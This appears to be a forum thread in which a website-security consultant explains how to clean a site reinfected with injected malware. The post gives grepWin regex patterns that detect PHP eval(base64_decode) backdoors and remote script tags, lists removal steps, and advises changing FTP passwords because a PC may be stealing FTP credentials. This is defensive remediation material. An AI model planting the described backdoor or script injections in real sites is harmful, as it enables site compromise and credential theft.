Hello Sir,

pls provide your website url so we can scan your site

Regards,
Simon
soswebscan.com

If you’re ready to do this yourself, I’ll provide the search strings and the free tools.

First, download grepWin. It’s free. http://code.google.com/p/grepwin/downloads/list I recommend the .msi file

If those are the only 2 codes (malscripts) you’re finding on your site then you can use these 2 regex search strings in grepWin:

For the first you identified in your post use:

<\?php\s*eval\(base64_decode\([\'|\"].*?[\'|\"].*?\)\);\s*\?>

And for the second malscript use:

<script src=http:\/\/.*?\.php\s></script>

Often times if you see the above code, you might also see some malscripts at the bottom of various .js files.

If so, you can use this regex search string to find and remove them:

document\.write\(\'<script src=http:\/\/.*?\.php\s><\\/script>\'\);

So, once you open up grepWin, assuming you’ve already downloaded all of your files to your PC use these settings:

In the Search in: box use the button (…) to select the folder where your web files are located.

Select Regex search and in the Search for: box use the first string I provided above.

Leave Replace with: empty

And use the following settings:

uncheck Search case-sensitive
check Dot matches newline
check Create backup files
uncheck Treat files as UTF8
check All sizes
check Include system items
check Include hidden items
check Include subfolders

Then hit the Search button. I’d like you to see the files that it finds. If you right-click on one of them in the Search results window, you can open it in an editor (Wordpad) and scroll through the file to see the malscript. Do this on a few of the files.

Then when you’re ready, hit Replace. it will save the original file with a .bak extension and the normal file name will have that string removed.

Then repeat the process with the next search string.

Then, because these types of websites will happen over and over again, change all FTP passwords. If you’re using FileZilla or any one of the FTP programs listed here: http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/

then change to a different FTP program. I like WS_FTP by Ipswitch because they do encrypt the stored usernames and passwords.

The root cause of the re-infection could be a virus on a PC with FTP access to your website. This virus steals the FTP login credentials, sends them to a server which then infects your website. That might be why it’s happening over and over again.

The php code you found above, is similar to what hackers install on websites, after they’ve logged in with the stolen FTP credentials, so they can re-infect the site without logging in.

You might have to use a different anti-virus program in order to find and remove the virus from a PC. I’ve had good success with Avast, F-Prot or Kaspersky. The reason is that the virus knows how to evade detection of your current anti-virus software. If you’re already using one of these, try one of the other ones. It has to be different.

Please post back here with any questions or updates.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com